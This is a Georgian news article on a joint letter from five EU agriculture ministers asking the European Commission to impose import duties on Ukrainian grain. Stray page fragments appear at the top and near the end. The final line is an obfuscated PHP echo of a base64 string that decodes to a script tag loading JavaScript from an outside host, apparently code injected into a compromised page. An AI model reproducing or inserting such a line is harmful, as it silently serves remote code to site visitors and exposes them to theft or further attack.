celsiusi
ავერსი საქკაბელი

 ბულგარეთის, პოლონეთის, რუმინეთის, სლოვაკეთისა და უნგრეთის სოფლის მეურნეობის მინისტრებმა ევროკომისიას ერთობლივი წერილით სთხოვეს უკრაინულ მარცვლეულზე იმპორტის გადასახადების შემოღება, ინფორმაციას „ევროპეისკაია პრავდა“ უნგრეთის სოფლის მეურნეობის სამინისტროზე დაყრდნობით ავრცელებს.

უნგრეთის სამინისტროს მიერ მოხსენებულ წერილში ევროკავშირის ხუთი ქვეყანა სთხოვს ევროკომისიას, მიიღოს ზომები უკრაინის სოფლის მეურნეობის პროდუქტების საკითხზე, რომელიც, მათი თქმით, აზიანებს მათ საექსპორტო ბაზრებს. მინისტრებმა წერილში აღნიშნეს, რომ მათი ქვეყნები აწარმოებენ ბევრად მეტ ხორბალსა და სიმინდს, ვიდრე სჭირდებათ.

„ბრიუსელმა უნდა შემოიღოს ზომები, რომლებიც დაიცავს უკრაინის მოსაზღვრე წევრი ქვეყნების ბაზრებს და დაეხმარება მათ სრული საექსპორტო პოტენციალის გამოყენებაში. ერთ-ერთი ასეთი ღონისძიება შეიძლება იყოს იმპორტის გადასახადების შემოღება გარკვეულ სოფლის მეურნეობის პროდუქტებზე“, – ნათქვამია წერილში.

მინისტრები ამბობენ, რომ მათი ქვეყნების ფერმერებმა „განიცადეს მნიშვნელოვანი ზარალი“ მას შემდეგ, რაც ევროკავშირმა შარშან უკრაინიდან მარცვლეულის იმპორტის გადასახადები შეაჩერა.

შეგახსენებთ, 2023 წლის სექტემბერში პოლონეთმა, სლოვაკეთმა და უნგრეთმა გამოაცხადეს შეზღუდვები უკრაინული მარცვლეულის იმპორტზე მას შემდეგ, რაც ევროკომისიამ გადაწყვიტა, არ გააგრძელოს იმპორტის აკრძალვა უკრაინის მეზობელ ევროკავშირის ხუთ ქვეყანაში.

180
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");